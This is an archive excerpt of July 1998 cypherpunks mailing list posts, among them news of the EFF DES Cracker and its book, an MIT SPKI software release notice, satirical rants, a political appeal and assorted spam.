From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Fri, 17 Jul 1998 13:53:06 -0700 (PDT)
To: "acardin@v-wave.com>
Subject: Politicians...
Message-ID: <199807172107.RAA09933@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain



you wrote in the Canadian Firearms Digest V2 #498

>Date: Fri, 17 Jul 1998 09:33:52 -0600
>From: Gordon <acardin@v-wave.com>
>Subject: politiians
>
>Politicians and diapers should be changed regularly. and for the same
>reasons!

ROTFL!

I took the liberty to Cc this message to a few friends.  :-)

Mind if I use it in one of my .sig file?

Ciao

jfa







Jean-Francois Avon, B.Sc. Physics, Montreal, Canada
  DePompadour, Socit d'Importation Lte
     Limoges fine porcelain and french crystal
  JFA Technologies, R&D physicists & engineers
     Instrumentation & control, LabView programming
PGP keys: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891 
PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Fri, 17 Jul 1998 16:20:54 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - July 17, 1998
Message-ID: <199807172205.RAA30430@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain




<FONT COLOR="#000000"
SIZE=2>=============================================
Welcome to today's edition of the CTIA Daily
News
from WOW-COM.  Please click on the icon /
attachment
for the most important news in wireless
communications today.

WIRELESS IT '98, The Next Generation in
Personal
Computing & Communications October
12-14,
Las Vegas, Nevada Call (202) 785-0081 for more
information!
<FONT COLOR="#000000"
SIZE=2>=============================================
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Fri, 17 Jul 1998 17:11:31 -0700 (PDT)
To: cypherpunks, cryptography@c2.net
Subject: ZDTV and CNN coverage of DES Cracker
Message-ID: <199807180011.RAA02044@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


ZDTV will have me on the 8PM news tonight, and Barry Steinhardt on
their "Silicon Spin" program today.

CNN took pictures earlier today, I don't know when they'll use them.

	John




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Fri, 17 Jul 1998 17:53:58 -0700 (PDT)
To: cypherpunks@toad.com
Subject: FWD: new MIT SPKI software release
Message-ID: <3.0.5.32.19980717173912.00929100@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


fredette@theory.lcs.mit.edu (Matt Fredette) writes:
==================================================
Subject: new MIT software release

A new release of the MIT SDSI/SPKI C software distribution is 
available.  Go to

http://theory.lcs.mit.edu/~cis/sdsi.html

and follow the software distribution links in the paragraph about 
SDSI/SPKI 2.0.  Note that you must be a US or Canadian citizen, etc., 
to get this software.  

The following binary builds are available:

sdsi20-0.4.0-sparc-sun-sunos4.1.4.tar.gz
sdsi20-0.4.0-sparc-sun-solaris2.5.1.tar.gz
sdsi20-0.4.0-i386-pc-solaris2.6.tar.gz
sdsi20-0.4.0-i386-unknown-netbsd1.1.tar.gz
sdsi20-0.4.0-mips-sgi-irix5.3.tar.gz

An Intel Linux build will hopefully be available soon.

These are all built from the source distribution:

sdsi20-0.4.0.tar.gz

As usual, many bugs were fixed in this release.  See ChangeLog in the source
distribution for the details.

More general notes from the 0.4.0 README:

Release 0.4.0
-------------

This code now requires (sequence )s to conform to the expected grammer
in the structure-06 draft, i.e., it supports the macro "def" and "ref"
mechanism, and, if threshold subject support is compiled in, the
"process-threshold" mechanism.  It will reject sequences that use
the old (do hash ) or old (do k-of-n) directives.

DSA support has been finished, and is compiled into the library by
default.  This means that SDSI2_FEATURE_STRUCTURE6_SIGS is defined by
default; since this changes the grammar for signatures to match what
is expected in the structure-06 draft, earlier signatures will break.
See the applicable blurb in the 0.3.0 notes of the README for details.

PGP support has been extended to handle what I believe to be the
majority of PGP 5.0 keyrings.  If your PGP private keyring uses IDEA
or CAST5 with MD5 or SHA1 to seal the secrets, sdsi2sh should be able
to read it.  PGP DSA keys are fully supported.

The SDSI distribution now includes MIT-written multi-precision integer
and DES libraries.  This means that you don't have to track down and
compile GNU MP and Eric Young's libdes if you don't want to.  If you
do still want to compile with one or both of these other libraries,
you can - see the main documentation for instructions on when you may
want to, and how.

The reduction code has been completely rewritten.  It's separated out
from sequences, in its own little internal API.  You step a reduction
with rules until you run out of them, and then you can get out the
conclusion that results from those rules.  It's possible to reduce
a whole (sequence ) into its equivalent (cert ), or to just reduce
two (cert )s into one.

The cache API has changed considerably, to present the face of a
generic S-expression cache.  sdsi2_cache_add_search_term is a single
function used for incrementally building a cache query, that works a
lot more intuitively than the old add_search_.._term functions did.
The actual cache format has not changed.

The ugly story of unparsing S-expressions, or filling a sdsi2Sexp, has
been completely retold.  It is now possible to allocate a new
sdsi2Stream, simply "push" canonical elements (like whole sdsi2Sexp *,
sdsi2ByteString *, integers, etc.) onto it, and then just call
sdsi2_sexp_parse to have it parse that into a new sdsi2Sexp.

Two new commands have been added to sdsi2sh: "load" and "save" allow
you to load a variable from and save a variable to a file.

Matt

-- 
Matt Fredette
fredette@bbnplanet.com, fredette@mit.edu, fredette@theory.lcs.mit.edu
http://mit.edu/fredette/www
"The first time the Rolling Stones played, three people came."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: philo <philo@devoted.net>
Date: Fri, 17 Jul 1998 18:01:12 -0700 (PDT)
To: cypherpunks@toad.com
Subject: http://www.devoted.net/
Message-ID: <35AFF3E6.51E80BBC@devoted.net>
MIME-Version: 1.0
Content-Type: text/plain








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSqncrs@aol.com
Date: Fri, 17 Jul 1998 16:44:08 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Politicians...
Message-ID: <2bc02f8e.35afe1a5@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 7/17/98 5:48:16 PM Central Daylight Time,
jf_avon@citenet.net quotes:

<< >Politicians and diapers should be changed regularly. and for the same
reasons! >>

It's the easy way out (and I mean DOWN and OUT)!  I mean, if we're simply
going to change them out everytime, why bother to figure out which ones aren't
evil/stupid (I mean, out of all those politicians, there's got to be 1 or 2!
I think. ;-) )?

See, if we just simply change politicians at every chance, then we throw the
baby out with the bathwater, so to speak.  The simple solutions aren't always
the best ones.

Stan,
http://members.aol.com/whtsametau/camel/index.htm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Global Web Builders <gwb@gwb.com.au>
Date: Fri, 17 Jul 1998 04:01:20 -0700 (PDT)
To: (Recipient list suppressed)
Subject: HANSON BEING BANNED: PLEASE ACT ON THIS EMAIL
Message-ID: <1.5.4.32.19980717102002.0073f0f4@gwb.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Dear One Nation supporter in NSW,

Pauline Hanson has been banned from using council facilities in her
electorate of Blair.

The Labor-dominated Ipswich City Council, the heart of Pauline Hanson's seat
of Blair, has returned to their old politically motivated tricks against the
One Nation party.

With the recent Queensland State Election turning the mainstream parties on
their heads the word has gone out - do anything that you can to deny One
Nation their right to a "fair go".

The Council allowed One Nation to use their facilities after a 6 month long
ban following the breaking of a council hall window at the party's launch by
protesters in April 1997. The ban was imposed on the basis of "protecting
council staff from danger".

http://www.gwb.com.au/gwb/news/onenation/launch.html

An example of recent (1998) pre-state election use by Pauline Hanson of the
Ipswich City Council facilities can be seen at:

http://www.gwb.com.au/onenation/qldstate/polaunch/index.htm

at the above link Pauline Hanson launched One Nation's state policies
without any security problems or risk to council staff.

One Nation used Ipswich City Council facilities on several occasions this
year without any protesters even making an appearance.

The basis of "fair go" and "freedom of assembly" is equity in decision making. 

At a recent Labor Party meeting One Nation members demonstrated peacefully
outside the council venue yet no such threat or withholding of council
facilities to Labor has been suggested - nor should it.

Following the State Election the rules have apparently changed.

The Ipswich City Council this week rejected an application by Pauline
Hanson's One Nation to use council facilities on the basis of "concern for
the safety of staff".
The mayor of Ipswich, John Nugent, was one of those voting against One
Nation's use of council facilities.

This is laughable as the last time protesters appeared at a One Nation
meeting was over a year ago in June 1997.

One Nation has (to ensure council staff safety) offered to supply private
security and ensure that sufficient police are on standby - this offer has
been rejected.

The link below will take you to an image of one of the chief protagonists,
Councillor Paul Tully, a Labor supporter who has made it his life ambition
to destroy what Pauline Hanson and you stand for.

http://www.gwb.com.au/gwb/news/onenation/gold/tully.jpg

Can we let him win?

I don't think so.

I appeal to you to write, in the strongest terms possible, to the local
Ipswich paper, The Queensland Times.

Their email address is:

qt@gil.com.au

Remember to keep your letter to under 200 words to ensure publication.

Issues to look at:
==================

1) The damage to Ipswich's reputation through these undemocratic antics.
2) Freedom of speech.
3) Labor's underlying undemocratic motives.
4) What role the ratepayers who voted Hanson have been allowed in on this
decision by the Labor council?

I encourage you to send the Queensland Times an email letting them know how
YOU FEEL about the Ipswich City Council's decision to prevent Pauline Hanson
from using ratepayer's facilities.

GWB




Scott Balson





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: COMPUTERTIME12@yahoo.com
Date: Fri, 17 Jul 1998 19:12:47 -0700 (PDT)
To: anyone@anywhere.com
Subject: EARN A PENTIUM II 300 MMX WITHOUT 1 PENNY OUT OF POCKET..
Message-ID: <199807180215.LAA01415@naka0.midland.co.jp>
MIME-Version: 1.0
Content-Type: text/plain




 <FONT COLOR="#000000" SIZE=4><B>GET A FULLY LOADED   266 mmx or 300 mmx Pentium II<FONT COLOR="#000000" SIZE=3></B>

</P><P ALIGN=CENTER><FONT COLOR="#000000" SIZE=4><B>or a<FONT COLOR="#000000" SIZE=3></B>
</P><P ALIGN=LEFT>
Pentium II  266 LAPTOP NOTEBOOK

  with            $0  COST OUT OF POCKET  !!!
 
 
 NOTHING DOWN !!!   100% FINANCING !!!
 
 A,B,C, or D credit,  NO PROBLEM !!!
 99.99% APPROVAL !!!
 
 
 
YOU WILL RECEIVE THE FOLLOWING:
 
 COMPUTER 
 PLUS:
 2 yr's Internet Svc.
 2 yr's Dist. Website
 2 yr's Business Website
 2 yr's Virtual Shopping Mall
 at NO COST !!  
 
 PAID  FOR  TOTALLY,
   and not take one thin dime out of your pocket !!!
  Our Company  pays off your Computer with the proven plan that we have in place. We will share that with you when we call you back. 
 
 The company has been around for  4 1/2 years. 
  And started  this NEW program about 12 weeks
  ago and it is absolutely EXPLODING !!!
 
 Some people are paying their computer 
  off in 1 HOUR with our plan in place. Take advantage of our group and we will show you how!!!
 
 ---------------------------------
 
 In the 2 Packages
 You get the following:
 
 *  A 266mmx or 300mmx  Pentium II
 *  32 or 64 Megs of Ram
 *  4 Meg Video Card  w/ TV Output
 *  4.3 or 6.4 Gig HD
 *  3.5 Floppy Drive
 *  56k Flex-Fax Modem
 *  32x CD Rom
 *  16 Bit Soundcard
 *  60 or 200 Watt Speakers
 *  104 Keyboard & Mouse
 *  15" or 17" SVGA Color Monitor
 *  LexMark Color Inkjet Printer 
 *  Microsoft Windows 95
 *  Plus additional Software
    
 
 
 FOR INFORMATION ...CALL TOLL FREE..
         
               <FONT COLOR="#000000" SIZE=4><B>1-888-588-3713 (24 hrs / 7 days a week) 
                      TOLL FREE NUMBER<FONT COLOR="#000000" SIZE=3></B>

         
 Fax on Demand   415.273.3995  (24hrs.)
 
 
 
 
          
 REMEMBER THIS:
 
 Just refer  5   and you earn  $1500  in commisions
 PLUS......the company sends you a MONTHLY BONUS, which you can use to pay off
your computer/lease balance ,  then.... with 5 more sales 

  IT'S YOURS AT NO COST !!!    Not a DIME OUT OF YOUR POCKET...
 
 .....................................................................................................................

</PRE></HTML>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Fri, 17 Jul 1998 22:31:20 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Live At The CypherMore - SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <009C955B.4C2DE0E0.1@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


Live At The CypherMore East - THEM...LIVE! - SAHMD!!!
_____________________________________________________

Actually, the movie, produced in 1988, and released just
in time to throw the Author into a hysterical state of Termial
Paranoia, was called, "They Live, and still is. (called that,
I mean). 

[EditWhore's Node: The reason the Author never bothers to
 go back and correct his spelling, syntax (whatever that
 is) and miscarriage-returns of linguistic justice, is 
 that her mentor, who was as equally good a pitcher as she
 was a catcher, told her, "Never rewrite, the reader might
 be gaining on you."]
  
It was a dark and normal night...
Until the Author booted up SCO Xenix at 4 a.m. in a sleazy
little motel room in ButtFuck, North Dakota. Then, as the
Daemons, Zombies, Orphan Zombies and the dreaded Cron were
released to wreak their havoc in ToshibaWorld, in the heart
of the Author's 5200C portable computer, LadyLuck, not having
a date for the evening, intervened to provide mitigating
circumstances which would eventually become evidence in the
Court Of Public Opinion as to the mitigating circumstances
which needed to be considered before sentencing the Author
to a lifetime of Hard Labor, trying to give birth to a new
perceptive world-view paridigm in which WeTheSheeple felt
perfectly comfortable returning a judgement of, "Guilty,
by reason of insanity." (As well as a guilty verdict on the
misdemeanor charge of, "I don't care if the people from the
Justice Department *are* reaming you a new cornhole on my
living room floor, I don't want you using that kind of
language in front of my children.")


For the Author, as his (or her...or their) mind began to break
under the strain of trying to hold back the Forces of Evil
that escaped from Bell Laboratories, hidden in the carry-on
baggage of the Unix Operating System, the only hope of sanity
seemed to lie in turning on the BoobTube (even though they
visually bleep out the naked boobs on TV in North Dakota),
and trying to defend HimOrHer self with the technological
opiate of the asses...Gilligan's Island.

It was not to be...
Instead, despite the fact that TV goes off the air around
10 p.m. in the smaller northern states, the Author found
himself finding himself foundering in a flow of Taoist
synchronicity which goes far beyond the temporal concerns
of everyday life, resulting in him living a schizophrenic
existence, torn between Arizona and Saskatchewan, neither
of which adheres to the Daylight Saving Time standard that
decent, God-fearing Americans and Canadians hold sacred,
whereupon the movie, "They Live" sprung on to the Midget
Silver Screen sitting atop a faded yellow table with
cigarette burns around the edges, completely out of
visual harmony with the vile-green colored rug with a
multitude of cigarette burns dotting its nearly threadbare
surface.

The Author found HimOrHerSelf battling the Mutant Monsters
created by 'our engineers' talking to 'their engineers'
(without ever managing to discover why your hard drive only
crashes just before your job-performance review), as well
as simultaneously drinking in the sights and sounds of a
movie showing on a TV set which had not yet been plugged
in--a movie in which a pair of "men who love men, every
now and then" [WAS: Male Bonding In America - I Think Some
People Are Going Just A Little Too Far] found themselves,
on a dark and stormy night [(c) Snoopy], discovering a
box of dark glasses which enabled them to see the scum-
sucking aliens living in humanity's midst, without our
knowledge.
The Author, for the first time realizing the dire warning
hidden in ZZ Top's classic musical offering, 'Cheap Sun
Glasses,' decided that, given the fact that the theme of
his last music album, "Please! Stop Me Before I Sing 
Again," had been embraced by the music-loving public to
such a degree that he was hounded out of the industry,
SheOrHe's only realistic course of action, in order to
warn others about the frightening dangers to be found
lurking within the heart of the Unix Operating System,
was to use the Medium to proclaim the Message (even though,
according to Marshal McClueHandLuke, they are identical
twins, although in a microcosm-macrocosm sort of way,
like Danny DeVito and Arnold Schwartzenager).
Thus was born, "The Xenix Chainsaw Massacre - The True 
Story Of The InterNet - Part I."

The rest is history...
Well, not *all* of it is history, since we are currently
writing some of it, now...which you are reading...now.
And the rEvolution is NOW!, too, so... 

Lying Awake In Bed At 4 a.m. Burning Question #38679:
"Was the <Pg Up> key invented by a sorry, drunken
 asshole who could never keep track of the point he
 was trying to make?"

Wait here, I'll be back...

<Pg Up> <Pg Up> <Pg Up>
<Pg Down> <Pg Down> <Enter>
"Shit!"
<BackSpace> <BackSpace> <BackSpace>
"Fuck! Godamnn it!"
'o' <Enter> <Pg Down>

OK, like I was saying...
MultiMedia...

The Author, in 1989, had discovered and explored the 
first, true VirtualRealityMultiMediaExperience, in
which HeOrShe could no longer distinguish between the
Medium, the Message, the Meaning, the MeanderingMind,
or the voices inside her head which told her that
the Messages From Mars coming through the fillings
in her teeth were FUD, disseminated by an insurance
sales activist with a hidden agenda.
Worried about the fact that some egoistical, elitist
fuckwad might, at some point in the future, try to
claim credit for the Author's discovery of MultiMedia,
HeOrShe set Stanley's WayBack Machine to a point which
corresponded to the exact Time-Space-Mind equivalent
of the Nadir Point between alpha and omega, and could
distinctly hear Tim C. May <tcmay@got.net> hollering,
"I'm going to write about MultiMedia in the CypherPunks
archives on the first day the list exists, and you will
*never* get credit for the concept."

  The Author, realizing that the preceeding makes little
sense, suddenly realized that all HeOrShe really wanted
to point out in this chapter is that, despite the fact
that it is a B-grade movie in which Meg Foster never
shows her tits, the movie 'They Live' speaks a Truth
which needs to be understood by any individual who 
professes an interest in journeying beyond an imaginary
world-view in which he believes that buying the Jeep
seen sitting on top of the mountain peak will really
result in him getting to fuck the living shit out of
the large-breasted blonde bombshell lying across the
hood of the vehicle. (Or, alternatively, her thinking
that purchasing New Lemon Joy Dish Detergent will
really lead to her lifemate doing his share of the
dishes, and becoming more romantic, instead of just
humping her and then rolling over and going to sleep.)

ONE-TIME OFFER!!! [NOT TO BE REPEATED IN THE FUTURE]
  Any 'True Story of the InterNet' reader who undertakes
to watch, and believe the message of, 'They Live', is
hereby Officially Absolved of any guilt they may feel
in the future, over automatically deleting any post
sent to the CypherPunks Disturbed Male LISP by the
Author, despite any uneasy feeling they may have that
HeOrShe, in spite of the obvious lunacy inherent the 
MeatSpace Manifestation of the maunuscripts, is truly
from the GovernmentHomeForTheCriminallyInsane, and is
here to Help (TM) them...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: verify@nytimes.com (New York Times subscription robot)
Date: Fri, 17 Jul 1998 22:12:27 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Welcome to The New York Times on the Web
Message-ID: <199807180512.BAA12197@content9a.nytimes.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome, cypherpunk6,

Thank you for registering for The New York Times on the Web.  

****************************
ABOUT YOUR REGISTRATION 
****************************
Your subscriber ID is cypherpunk6 
You selected your password at registration.
Your e-mail address is cypherpunks@toad.com    

We encourage you to print this message and save it for 
future reference.  If you have any questions about your 
registration we can find your account using the ID
and e-mail address listed above.

Unless you chose otherwise, your ID and password
have been saved on your computer so that you do not have to
enter them each time you visit our site.  Please keep in mind
that you can enter this ID and password on any computer 
to reach our Web site, so if you change computers or
install a new browser, there is no need to re-register.  If you
forget your password, please do not re-register.  You can retrieve
your password in the Help Center by clicking "Help" anywhere 
on the site.

For more information about the site and your registration, please
visit the Help Center at:

http://www.nytimes.com/subscribe/help/

*****************************************
ABOUT THE NEW YORK TIMES ON THE WEB
*****************************************

The New York Times on the Web combines the quality 
news coverage, authority and integrity of The New York Times 
with the immediacy, utility and depth of the Internet.  Our site 
includes daily contents from The Times, news updates 
every ten minutes from the Associated Press and throughout 
the day from New York Times editors, a low-cost 365-day 
archive of New York Times articles, and original reporting 
exclusive to the Web in CyberTimes.

The Times on the Web also features: 
** Up-to-the-minute sports scores and statistics 
** Current weather conditions and 5-day forecasts for over 
1,500 cities worldwide
** A searchable library of more than 50,000 book reviews
** Custom stock portfolios 
** Searchable Real Estate and Help Wanted listings 
** Subscription service to the Crossword Puzzle, Bridge 
and Chess columns    

Thank you for registering.  

Visit us again soon at:  http://www.nytimes.com

*****************************************

Please do not reply to this message.  If you did not 
authorize this registration, someone has mistakenly
registered using your e-mail address.  We regret 
the inconvenience; please FORWARD this message
to cancel@nytimes.com and we will remove it from
our records.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Sat, 18 Jul 1998 01:33:08 -0700 (PDT)
To: cypherpunks@toad.com
Subject: There ARE NO Coincidences...
Message-ID: <009C9574.B7195CE0.13@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


     * From: StanSqncrs@aol.com

This is an interesting, coincidence?  ;-)

In a message dated 7/18/98 12:58:15 AM Central Daylight Time,
lreed@west.cscwc.pima.edu writes:

<< The Author, for the first time realizing the dire warning
 hidden in ZZ Top's classic musical offering, 'Cheap Sun
 Glasses,' ... >> 
ROFLOL!  What's coincidental?  The latest tune that my band, Nobody's Business
(in which I play bass and sing) has learned, is Cheap Sunglasses by ZZ Top.
If it ain't coinicidence, I got a 'scarecrow' in my band.

Someone tell me if it's good or bad to be in the 'Space Aliens Hide My Drugs'
series.  ;-)

Stan,

~ ~ ~ ~

It's no coincidence, Stan...we've been keeping an eye on you.

Toto
~~~~
p.s. - ou've got something hanging from your lip.
p.p.s. - No...the *left* side...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Saxgrim@aol.com
Date: Fri, 17 Jul 1998 22:39:44 -0700 (PDT)
To: cypherpunks@toad.com
Subject: d
Message-ID: <4282906a.35b034bf@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


d




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aytsd9238@sprynet.com
Date: Fri, 17 Jul 1998 23:26:28 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: Earn $100 every time OUR phone rings...
Message-ID: <199807180626.XAA09707@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


ALL YOU DO IS ADVERTISE THIS 800 NUMBER! THAT'S ALL!! 

$100 goes to you for EVERY sale that the company closes!

Does the idea of making at least $1,000 per week 
beginning your 2nd week of doing business excite you? 

How about never having to sell a thing to your customer 
and never having to talk to ANYONE to make money? I don't 
know how this could get any easier.

EVERY aspect of selling or talking to someone is DONE 
COMPLETELY by the company!  

The number one home based business for the 2nd year in 
a row, Top Secrets is a member of the Better Business 
Bureau and the U.S. Chamber of Commerce.

WHAT THIS BUSINESS WILL DO FOR YOU:

* Handles all your calls, closes your sales, and 
  sends you WEEKLY commission checks! 

* It pays you a $100 commission (that's over 50% of the total 
sale)
  for EVERY sale. CHECKS put $$$ in your pocket in less than your 
first 
  week or two... Quick commission earnings build and maintain 
motivation. 
  ALL YOU DO IS ADVERTISE the toll-free number and your ID 
number. 

* You can get STARTED TODAY. Just advertise the business 
toll-free 
  number with your ID # and let this business CLOSE YOUR SALES 
every day...
  They do all the work and YOU GET PAID FOR IT! 

* You may advertise any way you choose: Bulk E-Mail, Flyers, 
Classifieds, 
  Postcards, etc. Suppose you use bulk E-Mail, as I am: 100,000 
E-Mails
  with a 1/10th of a percent (0.1%) sales rate at $100 per sale 
nets 
  $10,000... not too bad.

There is nothing else out there that will provide you with an 
immediate 
income beginning THIS WEEK with minimal effort.

Before you call, I want you to think about the quality of the 
live 
operators handling your call. I am convinced you will not find a 
better 
team of closers for your own personal sales.  You will clearly 
understand 
what I am talking about once you call.  

PLEASE DON'T LET THIS PASS YOU BY. MAKE THE CALL!!

1-800-811-2141

You will be asked for ID #56130 when you call.

(Live operators are available from 8 AM-10 PM CST Monday through 
Saturday and will be able to answer any questions you may have.)

Call one of the 24hr TESTIMONIAL lines at 888-703-5389, 
888-446-6949, 888-446-6951 or 888-731-3457 (all toll free). 
 
 
 
 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSqncrs@aol.com
Date: Fri, 17 Jul 1998 23:48:18 -0700 (PDT)
To: cypherpunks@toad.com (coolness)
Subject: Re: Live At The CypherMore - SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <9e46edbf.35b043a1@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


This is an interesting, coincidence?  ;-)

In a message dated 7/18/98 12:58:15 AM Central Daylight Time,
lreed@west.cscwc.pima.edu writes:

<< The Author, for the first time realizing the dire warning
 hidden in ZZ Top's classic musical offering, 'Cheap Sun
 Glasses,' ... >> << ... Worried about the fact that some egoistical, elitist
 fuckwad might, at some point in the future, try to
 claim credit for the Author's discovery of MultiMedia,
 HeOrShe set Stanley's WayBack Machine to a point which
 corresponded to the exact Time-Space-Mind equivalent
 of the Nadir Point between alpha and omega, and could
 distinctly hear Tim C. May <tcmay@got.net> hollering,
 "I'm going to write about MultiMedia in the CypherPunks
 archives on the first day the list exists, and you will
 *never* get credit for the concept." >>

ROFLOL!  What's coincidental?  The latest tune that my band, Nobody's Business
(in which I play bass and sing) has learned, is Cheap Sunglasses by ZZ Top.
If it ain't coinicidence, I got a 'scarecrow' in my band.

Someone tell me if it's good or bad to be in the 'Space Aliens Hide My Drugs'
series.  ;-)

Stan,
Nobody's Business
http://members.aol.com/stansqncrs/nobiz.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "RAED SALAH" <RAEDS@email.msn.com>
Date: Sat, 18 Jul 1998 02:37:16 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: PLEASE SEND ME FREE STUFF
Message-ID: <000101bdb22f$6838c580$2a4c2499@default>
MIME-Version: 1.0
Content-Type: text/plain


MY NAME IS BRENDA SALAH AND MY ADRESS IS PO BOX 218624 HOUSTON TX 77218 AND
MY E MAIL ADRESS IS RAEDS@MSN.COM I WOULD LIKE TO START RECEVING FREE STUFF
PLEASE E MAIL ME BACK AND LET ME KNOW HOW TO GET STARTED THANK YOU BRENDA
SALAH RAEDS@MSN.COM







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "RAED SALAH" <RAEDS@email.msn.com>
Date: Sat, 18 Jul 1998 02:39:45 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: MORE
Message-ID: <000101bdb22f$c0e0b1c0$2a4c2499@default>
MIME-Version: 1.0
Content-Type: text/plain


MY NAME IS BRENDA SALAH AND I WOULD LOVE TO GET FREE  STUFF MY ADDRESS IS PO
BOX 218624 HOUSTON TX 77218 AND MY E MAIL ADDRESS IS RAEDS@MSN.COM THANK YOU







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSqncrs@aol.com
Date: Sat, 18 Jul 1998 02:56:16 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: There ARE NO Coincidences...
Message-ID: <c60e6c47.35b0710c@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 7/18/98 3:56:56 AM Central Daylight Time,
lreed@west.cscwc.pima.edu writes:

<< It's no coincidence, Stan...we've been keeping an eye on you. >>

That's why I suggest listening to I Robot by Alan Parson's Project.

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 18 Jul 1998 04:41:43 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Scanning the DES Cracker
Message-ID: <199807181138.HAA10065@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


>From the EFF Web site:

   "Cracking DES" has been published only in print because 
   US export controls on encryption make it a crime to
   publish such information on the Internet, but the book is 
   designed to be easy to scan into computers.

John Gilmore has written that he is unable to provide
the digitized text of the book sitting on his desk due to
export controls, and that Chapter 4 of the book explains
what EFF expects to happen. EFF will link to an offshore 
URL as soon as the volume has been scanned and
posted.

We'll commence scanning the book as soon as it arrives
here next week and will provide the exportable parts to 
those working on the US-forbidden.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "GayWeb.Net" <GayWeb@GayWeb.Net>
Date: Sat, 18 Jul 1998 11:54:07 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: Request To Submit A URL!
Message-ID: <419.435994.48982095GayWeb@GayWeb.Net>
MIME-Version: 1.0
Content-Type: text/plain


Hi Guys



    I love your site and wanted to see if I could get a link from your web
site to our web site. If you would like to have your web site listed at
our web site go to http://www.gayweb.net/GayLinks/submit.html and
add your web site automatically!


For Our Link Please use the information below or feel free to grab our
banner at .



GayWeb.Net - Web Hosting Services For The Gay Community!

http://www.gayweb.net/




Thank You,
The GayWeb.Net Staff - Staff@GayWeb.Net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eg_ckw@stu.ust.hk
Date: Sat, 18 Jul 1998 13:56:41 -0700 (PDT)
To: TRADE@ecntr1.hosp.go.jp,       LINKS?@ecntr1.hosp.go.jp
Subject: L I N K !
Message-ID: <glb@iohk.com>
MIME-Version: 1.0
Content-Type: text/plain


 Please add my site to your pages links, below is the code:
 
 <a href="http://www.samson-1.com">
 APHRODISIACS "REAL" (VIAGRA/GHB/TESTOSTERONE) - THE GREY MARKET WEB MALL</a>
 
Cut and paste this link onto your website. Also, please send us a link 
to your webpage using the same code. We then will immediately place it 
on our links page.

Our Web-Site is currently recieving 
approximatley 1000-1500 hits per/day.

Thanks,
Dan Amato - President

SAMSON powerlifting / Bodybuilding co.
1-888-256-6785  (Toll Free Phone Call)
email - samson@samson-1.com
web address - www.samson-1.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dumitru Tudor <dumitru@ycaar.com>
Date: Sat, 18 Jul 1998 05:34:19 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Oi!
Message-ID: <35B092AD.23F5B3DC@ycaar.com>
MIME-Version: 1.0
Content-Type: text/plain


We grew up with anger and violence...
Is it a smart thing to use those things that destroyed our
lives and planet to get what's right?
I would really wanna hear what you think it's right.

                             Lots of @narchy from,
                    
                               Pukie

My E-mail:pukie@d3tudor.demon.nl




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Sat, 18 Jul 1998 14:41:35 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: I had sex with Bigfoot/Married to the slob
Message-ID: <19980718205409.6227.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain

